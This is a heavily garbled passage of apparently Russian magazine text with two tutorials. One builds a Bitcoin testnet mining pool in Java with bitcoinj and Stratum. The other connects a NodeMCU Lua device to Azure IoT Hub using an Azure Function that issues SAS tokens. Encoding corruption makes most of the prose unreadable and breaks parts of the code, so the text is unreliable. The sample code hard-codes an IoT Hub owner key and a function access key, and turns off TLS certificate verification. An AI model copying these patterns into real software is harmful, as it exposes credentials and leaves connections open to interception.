牋牋牋�"jsonrpc",�"1.0")).toString(),燽uffer�>爗
牋燾reateJobData(buffer.toJsonObject());
});
?�?????�???�??????燡SON????�??.
{
�"result":爗
牋�"version":�??????�????>,
牋�"previousblockhash":�"<???�??????????�????>",
牋�"transactions":燵�??????????,�??????�????�???????��???>
牋牋爗
牋牋牋�"data":�"<??????�?????????>",
牋牋牋�"hash":�"<???�?????????,�??????�??????????�??�?????????�
?????�?????>",
牋牋牋�"fee":�???????��????????�????�??????��???????>,
牋牋牋�...
牋牋爙
牋牋�...
牋燷,
牋�"coinbaseaux":爗�??????,�??????�????�???????��?????�
??????????�????????�????�????>
牋牋�"flags":�""
牋爙,
牋�"coinbasevalue":�????????????�??????�?�??????�????�????>,
牋�"target":�"<???????�???????�??�???�????>",
牋�"mintime":�???????????�????????�????�???????�????>,
牋�"mutable":燵�??????????�???>
牋牋�"time",
牋牋�"transactions",
牋牋�"prevblock"
牋燷,
牋�"noncerange":�"<??????????�???????爊once>",
牋�"curtime":�?????�???????�????>,
牋�"bits":�"<???????????�???????爐arget>",
牋�"height":�??????�???????�????>
爙,
�"error":爊ull,
�"id":�"1"
}
???�?� ??????�?� ???�???� ???�????� ????� ???????�?,� ???�??� ?????� ??????
nonce� ?� ???�?� ???�????� ???�?� (?� ????�????�??� ?????�???).� ???�???????
nonce��???�???�??�?�???�????�??�???�??�????�??�?�??�????��????�
?????�???� ?????�???� ??????�?� ???�?????� ???�????.� ???�?� ???� ???�?????,
???�??�????�?�??�???????�???�????�???�?????,��?????�???�???�????�
????� ??????� ???�??,� ???�???�??� ???� ?????� ????�???� ??????�?.� ??????
????� ?� ???�??�?????� ??????� ???�?� ???�?????� ?????� ????�??,� ???�?� ??
??????�?�??�?????�???.
???�??�???�????�?��??�?�???�?�???�??�?????�???燾oinbase??????�
??????,�??????�???�???�?�?????�??�????�????.�??�???�???�?�?�????�
???�???�?????�??,�??�?�??�?�??�?,�??�???�??�?,�???�?�???�?�????�
??.�??�?�???,��??�??�???�?????�???�???爏criptPubKey�爏criptSig.��??
?????�????� ??????�??� ????�????� ??� ???�?� Script,� ???????� ????�???
??�?????�??�???�?????.�??�?�???�?????�??�?????�????�??,�?????�???
???�???� scriptSig� ??� ???�??� ????�?????,� ?� ?????� scriptPubKey� ??� ?????� ?????�
??????.� ????� ?????�????� ???????,� ??� ????�?????� ???�???�?� ?????�??.� ???
???�燾oinbase?????�?????�??�??�????�???�?????,�?�???爏criptSig�??????�
????燾oinbase���???�??�?�?????�????�??????�??.�???��???�???�?
????,�??�?�??�?????�????�??�?????�?????�??�????.
???�????�????燾oinbase?????�?????
???�????�???� Bitcoin� ???�???� ???????�???� ?� ????�???�???�?� ???�??� ?� ??
???�??,� ??� ????????� ???????� ???�??,� ?????�?,� ???�?� ??� ???�?� ?� ???,� ????�
????�???�?�??�?????�??燾oinbase?????�?????燡ava????�????�??燽itcoinj.
TestNet3Params爌arams�燭estNet3Params.get();�//�?????????�???????�
????
byte[]爌ubKeyTo��(new燛CKey()).getPubKey();�//�??�?????�???�
????????�??????�???
Coin燾oin�燙oin.valueOf(blocktemplate.getJsonObject("result").
getLong("coinbasevalue"));
int爃eight�燽locktemplate.getJsonObject("result").getInteger(
"height");
String燾oinbaseauxFlags�燽locktemplate.getJsonObject("result").
getJsonObject("coinbaseaux").getString("flags");
byte[]爀xtranonce�爊ew燽yte[8];
String爉essage��"Troyanpool燫ulez!";
byte[]燾oinbase�爂enerateCoinbaseTransaction(params,爃eight,爀xtran
once,爉essage,爌ubKeyTo,燾oin).bitcoinSerialize();
private燭ransaction爂enerateCoinbaseTransaction(NetworkParameters�
params,爄nt爃eight,燬tring燾oinbaseauxFlags,燽yte[]爀xtranonce,�
String爉essage,燽yte[]爌ubKeyTo,燙oin爒alue)爗
牋燭ransaction燾oinbase�爊ew燭ransaction(params);
牋燬criptBuilder爄nputBuilder�爊ew燬criptBuilder();
牋爄nputBuilder.number((long)height);
牋燽yte[]燾oinbseauxFlagsData�爄sNotEmpty(coinbaseauxFlags)��
coinbseauxFlagsData�燞EX.decode(coinbaseauxFlags)�爊ew燽yte[0];
牋燽yte[]爉essageData�爉essage.getBytes();
牋燽yte[]燿ata�爊ew燽yte[coinbseauxFlagsData.length�+爀xtranonce.
length�+爉essageData.length];
牋爄f�(coinbseauxFlagsData.length��爗
牋牋牋燬ystem.arraycopy(coinbseauxFlagsData,�燿ata,�燾oinbs
eauxFlagsData.length);
牋爙
牋燬ystem.arraycopy(extranonce,�燿ata,燾oinbseauxFlagsData.length,
extranonce.length);
牋燬ystem.arraycopy(messageData,�燿ata,燾oinbseauxFlagsData.length
+爀xtranonce.length,爉essageData.length);
牋爄nputBuilder.data(data);
牋燾oinbase.addInput(new燭ransactionInput(params,燾oinbase,爄nputB
uilder.build().getProgram()));
牋燾oinbase.addOutput(new燭ransactionOutput(params,燾oinbase,爒alue,
ScriptBuilder.createOutputScript(ECKey.fromPublicOnly(pubKeyTo)).
getProgram()));
牋爎eturn燾oinbase;
}
???� ?????�??� ???�????� (???�?� ??� ???�??� ???� ??� ??????� ?????�????)� ????�
?????燾oinbase?????�?????�?�??�??�?:燾oinbase1,爀xtranonce,燾oinbase2.
??�?????� ????�?????� ?????� ???�?� ?� ???�?????.� ???� ???�?� ???�???�???�?
???�???�??� Stratum.� ??� ??????�???� ??� TCP/IP????????,� ?????� ???????� ?????�
????� ???�??� ?� ???�???� JSON.� ???�????� ????�??�??� ?????�????� ?� ????�
??????.
vertx.createNetServer().connectHandler(netSocket�>爗
牋�//�????�??????�???????????�???????�???????�??????
牋燫ecordParser爌arser�燫ecordParser.newDelimited("\n",爊etSocket);
牋爌arser
牋牋牋牋牋�.endHandler(v�>爊etSocket.close())
牋牋牋牋牋�.exceptionHandler(throwable�>爗
牋牋牋牋牋牋牋爐hrowable.printStackTrace();
牋牋牋牋牋牋牋爊etSocket.close();
牋牋牋牋牋爙)
牋牋牋牋牋�.handler(buffer�>爗
牋牋牋牋牋牋牋燬tring爄nputCommand�燽uffer.toString("UTF?8");
牋牋牋牋牋牋牋爌rocessCommand(new燡sonObject(inputCommand));
牋牋牋牋牋爙);
}).listen(33333);
???�????�??�???�???�???�??�??�????,��??�??�???�??�???�?�??�??
????� ?� ?????� ??� ?????� ???????�??�?????�?,� ???�?� ?????� ??????�?????,
??????� ??� ????� ??????� ?� ????????� ???� ???�???,� ????� ?????�???� ??� ??????�
???�?�???��??�???�???�??�?.�??�?????��??�???�?燬tratum�??�?� ???�
??????� ???.� ???�?� ?????�??????�?� ???�??�?????� ???�???�??� ?????� ??????
???�???�??�???,�??�????爀xtranonce�?�??�??�?���??�??�????�????�
???????�???�??�??�????,��??�??�??�????�???�???.
//�???????�?????????��??????
Miner爉iner�爊ew燤iner(netSocket);
miner.setExtranonce1(minerCounter++);
??�????�??� ??� extranonce� ?� ???�???�??� ????�?????�??� ???�????� ???????�
????�??�???��????�?�????�?爉ining.subscribe:
if�(command.getString("method").equalsIgnoreCase("mining.subscribe"))
{
牋燬tring燼nswer��"{\"jsonrpc\":\"2.0\",\"result\":[[\"mining.
notify\",\""�+爏ubscriptionId�+�"\"],\""�
牋牋牋�+爀xtraNonce1�+�"\","�+爀xtraNonce2.length�+�"],\"id\":1}";
????�???�?�??????�??�??�???.
{
"params":�
燵"<?????????????�??????>",�
�"<???�??????????�????>",�
�"<coinbase1>",�
�"<coinbase2>",�
燵"<???�?????????�",�...�"<???�?????????�>"],�
�"<??????>",�
�"<bits>",�
�"<?????�???????�????>",�
�????爐rue,�?�?????????�????????????�?�????�?????>],�
�"id":�"1",�"method":�"mining.notify"
}
???�?� ???�??� ???�??� ???????,� ??� ????�??� ???�??� ?????� extranonce,� ???�?
???�????� ???�?� ?� nonce.� ????� ????�?????� ???�???� ?????� ????� ?� ?????�???
???�燽itcoin?????.
TestNet3Params爌arams�燭estNet3Params.get();�//�?????????�???????�
????
//�?�???????�???????燾oinbase???????????
transactions.add(generateCoinbaseTransaction(params,爃eight,爀xtran
once,爉essage,爌ubKeyTo,燾oin));
Block燽lock�爊ew燘lock(params,燽lockVersion,爌revBlockHash,爉erkel
Root,爊time,燿ifficulty,爊once,爐ransactions);
byte[]燽lockBytes�燽lock.bitcoinSerialize();
executeRpc(new燡sonObject(ImmutableMap.of(
牋牋牋�"id",�"1",
牋牋牋�"method",�"submitblock",
牋牋牋�"params",燞EX.encode(blockBytes),
牋牋牋�"jsonrpc",�"1.0")).toString(),燽uffer�>爗
牋燡sonObject爎esult�燽uffer.toJsonObject();
牋爄f�(result.getString("result")�=爊ull)爗
牋牋牋燬ystem.out.println("????�??????�???????!");
牋爙
});
???�?� ????� ???????� ?????�??,� ???�?� ???�?????� ????� ???�????� ??� ????�?
??????�??�???�??�??.�??�??�?�?????�???�???�??????.
//�?????�????????????�?�??????
vertx.eventBus().consumer("miner.notify",爉essage�>爗
牋爁or�(Miner爉iner�爉iners)爗
牋牋牋爉iner.getSocket().write(message.body().toString());
牋爙
});
...
//�??????????�??????�?????????�??????????��????�?????
vertx.eventBus().publish("miner.notify",爅obNotification);
?????!
???� ???�??� ?????�??.� ????�???� ????????� ????�??�?� ???�??,� ?� ???�?
????????� ???�???.� ????�?� ???�?,� ???� ???� ???� ???�??�?� ???�???� ??????�?
??????��?????�?�??�?�??�?�?�??�?.��?�?????�??�??�??????�?�???
????�???�???� ???�??,� ???????� ???�?????�?� ???�????�?� ????� ??????� ?� ????�
???�?�???�?????�?,�???�?�?�?????�?????�??�?�???�????�)
??????
??????
?�?????
???????�?????
asommer@yandex.ru
??????�????????�??????
???�????????�????
??燦ODEMCU�+燗ZURE營OT燞UB
??�??� ???????�??� ???�??????� IoT???????�??� ?� ???� ????
???????�??.� ??� ?????�?????� ????� ????� ??� ????????� IoT?
???�???� ???�?????� ???�???�?� ??� ????�?� ???�???� ?� ?????,
???????,� ???�?????,� ??� ???�?� ??????� ????� ????�?� ????
?????�????�?.� :)� ?� ????� ??????� ?� ???�??�?,� ???� ?????�???
???�??� ?� ????�?� ?� ???�?� NodeMCU,� ??????�??� ????� Lua.
???�??�????�???????�??�?��?????�????燗zure燜unctions
?燭able燬torage,�?�??燩oC�??燦odeMCU��??�?燣ua�??�?
??????�?????� ?� ?� ???�???� ???�??�?????� ????????� IoT?
???????.
INFO
NodeMCU� ??� Expressif� ?� ???� ????� ??� ?????
??????�??� ????� ?� Wi?Fi,� microUSB� ?� ????�?????�
?????�?�??�?.�??�??�???�?�???�?????燛S?
P8266.� ???�?� ???�???� ??????�??� ???�?� ????�
???????�???�???????�?�?�7�??�????.��???�
???� ???�?� ????????� ??� Arduino� IDE.� ???�?� ????,
???�?� ???�????�???� ?????�????� ????� Lua
(??????�??�?��??�?????�??�?�??牜????�).
???????????��????????�??????
???� ????� ???�?� ???� Windows� ??????� ???�?????�?,� ???�?� ???�???� ????�??
??�??�?????�???�?:燙P210x燯SB爐o燯ART燘ridge燰CP燚rivers.
????�??�???� ???�????� ???�?????�???�???� ???�?� NodeMCU� ?
???�5�0�??/?.�?�?????�???�?????�??�??�??�????,�?�??�??�??�?
????�?� ??????�???� ???� ???�????� ?� 115� 200.� ???�?,� ???�?� ????�???� ????
????�??�???�??�?�????�?�??�????.
????�???�???�???
????????
???�??�??�?,��??�???????�??�??�??�?�??????�????�?�??�???,�????�?
?�??�??�??�?�??�???�?????�???�????�??????�?.�??�???�????燜irmware
???�?� ???�???�???� ???�???�?:� ?� ???????� ??�????�?� ???�???,� ??�???
Docker??�??�?????�??�??�???�??�??燣inux.
?�??????��??????�??????�?�??�???,�??��???�??????.�)
??�?� ???�?� ?????�???� ???�??� ?� ????�?,� ??� ??????�??�?� ???�???� SNTP,
MQTT,� HTTP� (Wi?Fi,� timer,� ?le,� GPIO,� net,� node,� UART� ???� ???�???� ??� ?????�
?????).� ???�?� ???�???� ????????� ?� ?????�??� ????�?????�?� TLS/SSL� support
?�??�??燤iscellaneous爋ptions.�???�?�燽in????�??�??�????�?�??�?.�???�
???� ???�???,� ???�????� ????� ???�?� ???� ????�?.� ????� ?� ????�??,� ???�?????�
??????�??�????��??�?????�??????,��??�??��?�??�????�?????.
??�??� ???�??�??� ESP8266� ????�?????� ???�??�?� ?� ???�??� ?????.
??� ???�?� ???�???� ??????�??� ????�?� FLASH.� ??� ???????� ??� ???�?� ????�????
???????�??�??????爎eset�?????�??�?????��????燽ootloader.�???�????
?� ???�?� ??????�????� ???�?� ?????� ????�?� ???,� ??� ?????� ???�??�??� ???�?
?????�???� GPIO0� ?� GND� ?� ??????� reset� (????� ???�??� ???�????� ???� ESP?12).
???�???燜irmware�??�?�??�????燩yFlasher.燩y��??�????�???�???,�??�???�
????�??� ??????�?� ??� Python.� ????� ???� nodemcu??asher,� ??� ???� ???�?� ???
??�??????�???.�?��?�??�????.
??�?燩yFlasher�??�????�??:
PyFlasher
Flash爉ode�?????�???��?????�??�?�?�???,�????��??�??�?.�???�????�
???� ???�????�??� ????� ??� ????� ???????� ESP8266� ESP?12� ?� ESP32� ???�????
?????燚IO,燛SP8266�?��?���????�??�???�????燪IO.燚OUT�??????�
????�?燛SP8285.
?????????營DE
???�???�?�??�???�??營DE�?�???�?� ESPlorer.��????�??�??�??�?????�???
ZeroBrane� Studio.� ???� ????�?� ???�?� ??� ????� ???�??�?� ESPlorer,� ?????�?
???�???�??�??�?????�???�?��??.
ESPlorer�??????�?燡AVA.�????????�??�???�??�????.
ESPlorer
?�????�??�???�??,�??�???�?��????�??.��??�??��???�?????�??�?
?� ?????�?� ???????�??� ?????�??.� ?????�???� ???�???�??,� ??????�?� ????.
????�??�???�?� ???�????,� ??� ???????� ?????� ???�???�???� ?????� (????�????
???�?,�??�5�0),��?????�?燨pen.
??�????�?�??�??�?�??�?�燛SPlorer
???�??�????�??�?�????�???�???�??�?????,�??????�???�?�????�????
???�???�???:
LED��gpio.mode(LED,爂pio.OUTPUT)
function爁lash_led()
gpio.write(LED,爂pio.LOW)
tmr.delay(500000)牋牋牋�
gpio.write(LED,爂pio.HIGH)
end
tmr.alarm(1,�00,爐mr.ALARM_AUTO,爁lash_led)
??�?�?�????�??�?�??�????�???�?�??�???�??�(???�???�??�??�??�????�
???� ???�???� ???�????� ???�???�???),� ??� ???�?� ???�???????� ?????�???
???�????�???�??�?????,�??????�??????�?�????�???�?:
print("Hello爁rom燣ua!")
???�?� ????� ???� ???�???� ????� ???�???� .lua� (?????�??,� test.lua),� ???�???
?� ????� ???� ?� ???�?????� ??� ????,� ???�?� ?????� ???�?????� ???� ??� ??????�???.
???� ???�?� ????�?????� ???????� ????,� ????� ??� ??� ??????� (????�?� Open),
?�?????�???�?燯pload.�?�??�?�??�?�??�?�??�??,�??????�??�?????�?
???�????�(???�?).
???�????�???,�????�??�??,�????�??�????�?
dofile("test.lua")
??�??�?� ???�?� ????�?� ????�??� ?� ???�??� ????,� ???�??????�??� ????�?
???� ??????�??.� ???�?� ???????,� ?� ???�??� ?� ????�????�??� ????�?????�?
?????� ??????� ????�?� Reload� (????�??� ???� ???�??� ????�?).� ??????�?� ???�??
???�??� ?� ???�????�???� ??� ???�?� ???�???� .lua.� ???????� ??� ????�?� ?� ???�??
???�?�????�??�???�?�??????�??.
??�?�?????,�??�?�???�????�????�??�?�??�?�???�????�??�?,�?�???�
???�???��??�??燗UTOEXEC.BA?�???,�?�???爄nit.lua.�)
?????????�???????�????�??�?????��??????????
??�????�?�???????�??�?�???�?????�???��??�????�??�???�??��????�
??.� ?� ?????�??� ???� ????�??� ??????�???� ???�?� ???�???� ???�?� ??� ???�???
Azure,�??�???�????�???�?????�??�?????�???.��???�?�??�??�?營oT?????
???�??�???�?燛xplorers�???�?????�??�???營oT燚evices��?????�+燗dd.
???� ???�??�????� ??????�???� ?� IoT?????� ???� ????�?????� ???�???�?????
SAS� (shared� access� signature).� ???� ??????�??� SAS� ??????�???�?� ????� ?????�
????� ??????�???,� ???????� ???�?� ????????� ?� ???????� ????�???�???�??� ????�
????�(Device燛xplorer,爄othub?explorer,營oT燛xtension爁or燗zure燙LI�0).�?�??�?
???�?� ????????� ????� ???� ???� ??,� ??� ???�???� Azure,� ???�?� ?� IoT� Hub� ?� IoT
Devices.
IoT燛xplorer
SAS� ???�?� ???�???�?????� ??� ??????�???,� ?� ???�?� ?� ???????� ???�??
??????????�???.� ?� ????�???,� SDK� ?????� ???�???�?????� SAS� ????�???�??�?
(???�????�?��???�??�???�???�???�???�?????�???).
???�????�?????��??????�??�???
???�??,� ???� ???????� SAS??????� ??????�???�?� ???????�????� ??� ????�?????�
???� ???�?,� ????� ?????� ??????�??.� ????� ?????�??�?� ?� ????�????�??� ?????.
????� ??????�???� ???�???� ????�?� ???� ??????�???,� ??� ???�???�?????� ?????
??????�??�???�???????�????�????????�??�???�?????�???.�????�?,�???�
??� ???�???� ???�???�???� ???�???,� ????�????� ?????� ???????:� ???�????
??� ??????�???� ???� Azure????�?� ????�???� ??????�???.� ?� ?� ????� ???�???
?????� ??????�???� SAS� ???�????,� ???�???�?� ??� ???� ?� ?????� ???�?� ???????�
????.�????�???�??,�???????燬AS�??�?�????,�???�?�???�??�?????�???
?�??�??�??�?.
???�??� ???�??,� ???� ???????� SAS� ??????�???�?� ??� ??????�???,� ?????
????�??� ?� ????�??,� ??� ????� ?????� ???????�??,� ???� ???,� ???????� ???�??
?� ??????�???,� ???�???�?????� ???�??� ??????� ????� ?� ??????�?????� SAS
??????�???� ?????�??????�?.� ??� ???�??� ???�??� ?????�??� ???�??� ????????
????�?燬AS�?????,�??�?�??�?�??????�???�???�?.
??�????,� ???� ???� ???�???� ??� ????�???� ???�?� ????????�?,� ????� ?� ??????
????� ???�??� ?� ??????�???.� ????� ??????� ?????�????� ?� ???????� VPN� ?????
??� ???????.� ?� ?????� ???�??� ?????� ??????�?� ?????� ???????,� ??� ???,� ????
???????��???�?????�???,�??�??�???????��??�??��?????.��?????�??,
??�?????�????燦odeMCU,燗rduino��????�??�??�??�?????�?�??�???�???�
??/??????��?????????�??????�??�??�???�?.
????????燗ZURE-???????�??�????????燬AS
?� ?????�??� ??????????�???� ???�?� ???�?� ??????�?????� Azure????�???.
???� ???�??�?????� ????�???,� ???????� ???�?� ??????� ???�?� ??� ???�???� Azure
?�??�??�?.�??�?�??�???,�?�????�???�??�???�????�?????�??�?�???
??�???�??�?.�????�?,�??�?�?�??�???�?�??�?????��???�?????�?��?
Visual� Studio� ?� ????�?� ?????� ???�???????� ?� Azure� ???� ?� ???????�???�??�??
????.�?????�??�???��????�???�???????,�??�??�???,�?�??�?�???�??
???�????.�?�??�????�?????�????�?,�??�??�??�???�??�?�?????�?????
????,�?�???�????�?????�(????�??燬ingle爎esponsibility).
???�???燗zure燜unction燗pp�??�?�?�??�???,�????�??�?????�??�????�
??.
???�????燗zure????�???
Consumption� Plan� ???�???�?� ???�???� ????�?� ??� ??� ??????� ???�???,� ???????
????�????�???.�??�????�?????�??�???�??.�?�??�??�?????�??�???
???????�??�???�???�?�??�???�?.�?????,�??�???�?��??�??�?�??�????�
??��???�???�???�??�??�???�?�??�??�(Storage).
???�?� ???�????� Function� App� ???�?� ???�???� ?� ????� ???�???.� ?� ???�??
???�??�??�??�?�??�???�???燱ebhook�+燗PI.�??�???�????�???�????�?
????� (???�??�??� ???�??),� ?� ?????� ????� ???�????� ????�?� ????�???�??� ????�
????�???.�??�??�?�???????�?�???�?????��??�??�?,�????�?�???�?�
Get爁unction燯RL.
??�?�?????�燗zure????�??�?
???�???�??�?�?????�?�??�?????�??�??.��???�??????燙#.
using燬ystem.Net;
using燤icrosoft.Azure.Devices;
using燤icrosoft.Azure.Devices.Common.Security;
using燬ystem.Globalization;
using燬ystem.Security.Cryptography;
using燬ystem.Text;
public爏tatic燼sync燭ask<HttpResponseMessage>燫un(HttpRequestMessage�
req,燭raceWriter爈og)
{
牋爏tring燿eviceid�爎eq.GetQueryNameValuePairs()
牋牋牋牋牋牋牋�.FirstOrDefault(q�>爏tring.Compare(q.Key,�"deviceid"
,爐rue,燙ultureInfo.InvariantCulture)�=�.Value;
牋爏tring爃ash�爎eq.GetQueryNameValuePairs()
牋牋牋牋牋牋牋�.FirstOrDefault(q�>爏tring.Compare(q.Key,�"hash",�
true,燙ultureInfo.InvariantCulture)�=�.Value;
牋爄f�(String.IsNullOrEmpty(deviceid))爎eturn爎eq.CreateResponse(
HttpStatusCode.BadRequest,�"device爄d爉issing");�
牋爄f�(String.IsNullOrEmpty(hash))爎eturn爎eq.CreateResponse(HttpSt
atusCode.BadRequest,�"hash爉issing");
牋爒ar爎esourceUri�"ArduinoDemoHub.azure?devices.net/devices/"+
deviceid;
牋�//爐aken爁rom營oT燞ub爑ser爓ith燙onnect燿evices爎ights�(not爁rom�
Device燛xplorer)牋�
牋爒ar燾onnectionString��"HostName=ArduinoDemoHub.azure?devices.
net;燬haredAccessKeyName=iothubowner;燬haredAccessKey=cuYBKc42lfJr4oS
RGQGQ8IiKWxGQkLre7rprZDZ/ths=";
牋爒ar爎egistryManager�燫egistryManager.CreateFromConnectionString(
connectionString);
牋爒ar燿evice�燼wait爎egistryManager.GetDeviceAsync(deviceid);
牋爒ar爇ey�燿evice.Authentication.SymmetricKey.PrimaryKey;
牋燞MACSHA256爃mac�爊ew燞MACSHA256(Encoding.UTF8.GetBytes("somera
ndomkeyKJBWyfy4gski"));
牋爒ar爃ashedkey�燙onvert.ToBase64String(hmac.ComputeHash(Encoding.
UTF8.GetBytes(key)));
牋爄f�(hashedkey!=hash)爎eturn爎eq.CreateResponse(HttpStatusCode.
BadRequest,�"wrong爃ash");
牋牋牋SharedAccessSignatureBuilder爏asBuilder�爊ew燬haredAccessSig
natureBuilder()
牋牋牋爗
牋牋牋牋牋燢ey�爇ey,
牋牋牋牋牋燭arget�爎esourceUri,
牋牋牋牋牋燭imeToLive�燭imeSpan.FromDays(Convert.ToDouble(7))
牋牋牋爙;
牋牋牋爒ar燬AS�爏asBuilder.ToSignature();
牋牋牋爎eturn爎eq.CreateResponse(HttpStatusCode.OK,燬AS);
}
???�???�???爌roject.json��????�???��???�??�?????�????�????:
{
牋�"frameworks":爗
牋牋牋�"net46":爗
牋牋牋牋牋�"dependencies":爗
牋牋牋牋牋牋牋�"Microsoft.Azure.Devices":�"1.4.1"
牋牋牋牋牋爙
牋牋牋爙
牋爙
}
?� ????� ??????�???�?� ????�?� ???�??�????� ?� IoT?????.� ??� ???�?� ???�???
??� ????�??� ???�??�????� ?� ??????�???.� ??� ???�??� ???�??� ?????�?,� ???� ??
???�?�????.
????�??�???�營oT?????
??�???�???�????燙onnection爏tring�?�????????????燩olicy��??�???燚evice
connect.� ????� ????�?� ???�??�????� ???�?� ??� ???�?????� ?� ????,� ???� ???�??� ?
(???� ?????�?????�?� ????� ???�???).� ???�?� ???�?� ???�?� ?� Application� settings
???�???.
????�???�??�??�?,�?�??????�??�?�??�?燗pplication爏ettings
?� ???�???� ???� ????�?� ???�??�????.� ???�?� ???�?� ??� ???�?� �??�?????�
??�??????�???�??�???�?��??????
ConfigurationManager.ConnectionStrings["???_?????_??????_???????????"
].ConnectionString
??� ??????�???� ???� ????�?????� ???�?????� hashedkey.� ??� ????�???????�?
???�?� ????�???�???� ???� ????�?,� ???�???�?� ??????�???� ???�??� ?????� ?????
Get,��?�??�??�???�????�??�???�??�???��??�????�??????�?.�??????
???燞ttpUtility.UrlEncode�?�???�????�??燬ystem.Web:
hashedkey�燞ttpUtility.UrlEncode(hashedkey);
??????????? ??????
?
? �?????�?????
??????
?????? ?�?????
??????�????????�??????
???�????????�????
??燦ODEMCU�+燗ZURE營OT燞UB
?????????�???�??�???????�?????��?????
?�??????�?????�??�??�?燣ua,�?????�?????�??�??��???�?.�??????�?
???�??�?????燩oC.�?????�??�?????�?????��?????�?????�??�???�???�
??.
???�???�??�??�?:爄nit.lua�燬endDataToCloud.lua.�????�????�??�???:
??�?????????�?�?????????
print('init.lua爒er�2')�
wifi.setmode(wifi.STATION)
print('set爉ode=STATION�(mode='..wifi.getmode()..')')
print('MAC:�'..wifi.sta.getmac())
print('chip:�'..node.chipid())
print('heap:�'..node.heap())
??�????????燱i?Fi
station_cfg={}
station_cfg.ssid="????_SSID"
station_cfg.pwd="??????_?????_?????_???????"
station_cfg.save=false
wifi.sta.config(station_cfg)
wifi_status_codes�爗
牋燵0]��"Idle",
牋燵1]��"Connecting",
牋燵2]��"Wrong燩assword",
牋燵3]��"No燗P燜ound",
牋燵4]��"Connection燜ailed",
牋燵5]��"Got營P"
}
sntp_connect_status_codes�爗
牋燵1]��"DNS爈ookup爁ailed",
牋燵2]��"Memory燼llocation爁ailure",
牋燵3]��"UDP爏end爁ailed",
牋燵4]��"Timeout,爊o燦TP爎esponse爎eceived"
}
??�???�??????????�燱i?Fi�(?????????�??????�?????�??????)
tmr.alarm(6,1000,�爁unction()�
牋爄f爓ifi.sta.getip()==nil爐hen�
牋牋牋爌rint("Waiting爁or營P燼ddress!�(Status:�"..wifi_status_codes[
wifi.sta.status()]..")")�
牋爀lse�
牋牋牋爌rint("New營P燼ddress爄s�"..wifi.sta.getip())�
牋牋牋爐mr.stop(6)�
牋�?�?????????????�???�燦TP
牋爏ntp.sync({'pool.ntp.org'},
牋牋爁unction(sec,爑sec,爏erver)
牋牋牋爌rint("Clock燬ynced:�"..sec..",�"..usec..",�"..server)
牋牋牋爐ls.cert.verify(false)
牋牋牋�?�????????�????????�???
牋牋牋燿ofile('SendDataToCloud.lua')
牋牋爀nd,
牋牋爁unction(error_code)
牋牋牋爌rint("Clock燬ync燜ailed:�"..sntp_connect_status_codes[error_
code])
牋牋爀nd,
牋牋�?�????????�????????????��?????�?????
牋�)
牋爀nd
爀nd
)
????� ????� ?????�???� ???�??�????� ?� ????� ?� ?????�???� ???� ??� ???�?� Send?
DataToCloud.lua� ?� ???�??� ???????�?� ???�??�????.� ????�?????� ???�???
?� ?????�??� ???�????� station_cfg.ssid� ?� station_cfg.pwd� ???�??� ???�?� ???�???
Wi?Fi.
?�??�?????�??�?�???�???�???�??�?????�???�營oT?????�(????????�
???� DEVICE� ?� IOTHUB).� ?� ???????�??� funcurl� ???�??� ?????� ??????�?????
SAS�??�???���????�??�??�????�??????�?爃ash�??�??�??�??�?�?????�
??� (???????� ??� ????�???????�?� ??????�???�?� ?� ???????
HttpUtility.UrlEncode).
??�???????????
DEVICE��"LuaDevice"�
IOTHUB��"ArduinoDemoHub.azure?devices.net"牋�
PORT牋��83
USER牋��"ArduinoDemoHub.azure?devices.net/"..DEVICE.."/
api?version=2016?11?14"
telemetry_topic="devices/"..DEVICE.."/messages/events/"
connected�爁alse
local爃eaders��
牋牋牋�'Content?Type:燼pplication/x?www?form?urlencoded\r\n'..
牋牋牋�'Accept:�*/*\r\n'..
牋牋牋�'User?Agent:燤ozilla/5.0�(Windows燦T�1;燱in64;爔64;爎v:47.
0)燝ecko/20100101燜irefox/47.0'
funcurl��"https://arduinofunction.azurewebsites.net/api/Genera
teSASFunction?code=Jn7j54PbR31BSRa0UZrDwp4ZEltjmWHmblG9zLo0Ne0tyGM7w/
wQ7w=="
funcurl�爁uncurl.."&hash=oJzykimyQsTPtzgJxYq90Xfqmw1rZTPTCH%2bJ5sS
urKI%3d"
funcurl�爁uncurl.."&deviceid="..DEVICE
tmr.alarm(1,5000,�爁unction()
http.get(funcurl,爃eaders,�
牋function(code,燿ata,爃eader)
牋牋if�(code��爐hen
牋牋爌rint("HTTP爎equest爁ailed")
牋爀lse
牋爏as�爐rue
牋牋爌rint(code,燿ata)
牋牋牋if爏tring.match(data,�"Shared")爐hen
牋牋牋牋tmr.stop(1)�
牋牋牋牋SAS�爏tring.sub(data,2,string.len(data)?1)
牋牋牋牋print(SAS)
牋牋牋牋connect(SAS)
牋牋牋end
牋爀nd
牋end)
爀nd)
function燾onnect(SAS)牋牋
??�??????�?????燤QTT
client�爉qtt.Client(DEVICE,�0,燯SER,燬AS)
??�???????????�營oTHub��??????�????????燤QTT
print�("Connecting爐o燤QTT燽roker.燩lease爓ait...")
牋tmr.alarm(2,1000,�爁unction()
牋牋client:connect(IOTHUB,燩ORT,�
牋�?燙allback��?????�????????�??????????
牋爁unction(client)
牋牋牋爐mr.stop(2)�
牋牋牋爌rint("Connected爐o燤QTT:�"..IOTHUB..":"..PORT.."燼s�"..
DEVICE)
牋牋牋燾onnected�爐rue
牋牋牋爏enddata()牋牋牋牋
牋爀nd,
牋�?燙allback��?????�?????
牋爁unction(client,爎eason)
牋牋牋爌rint("Error燙onnecting:�"..reason)
牋爀nd
牋牋牋牋牋)
爀nd)
end
function爏enddata()牋牋
牋爉ath.randomseed(1)
牋爐mr.alarm(3,�00,爐mr.ALARM_AUTO,爌ublish_data)
牋�?�???�????�?????????,�?�????�???????�????????燾allback
牋燾lient:on("offline",爁unction(client)
牋牋牋爌rint("MQTT燚isconnected.")
牋牋牋燾onnected�爁alse
牋爀nd)
end
??�??????,�???????????�?????��?????
function爌ublish_data()
牋爄f燾onnected�=爐rue爐hen
牋牋牋爏omedata�牋math.random(1,100)
牋牋牋�?�?????????????�?????�??�???????
牋牋牋爌ayload�牋
牋牋牋牋牋�"{燶"deviceId\"�燶""..DEVICE.."\","..
牋牋牋牋牋�"\"iotdata\"�"..somedata.."}"
牋牋牋�?�?????????�?????
牋牋牋燾lient:publish(telemetry_topic,爌ayload,��爁unction(
client)
牋牋牋牋牋爌rint("Data爌ublished爏uccessfully.")
牋牋牋爀nd)
牋爀nd
end
???�??� ??????�???�?� ???� ??????�??????� Azure� SDK,� ???� ???� ??????� ????�
??????�???�??�?�???�?�??�?????�?�??�??�???�?�燗zure.�??�??�????
???�????�?�??�?:燗WS,燝oogle燙loud營oT,營BM燱atson營oT燩latform.
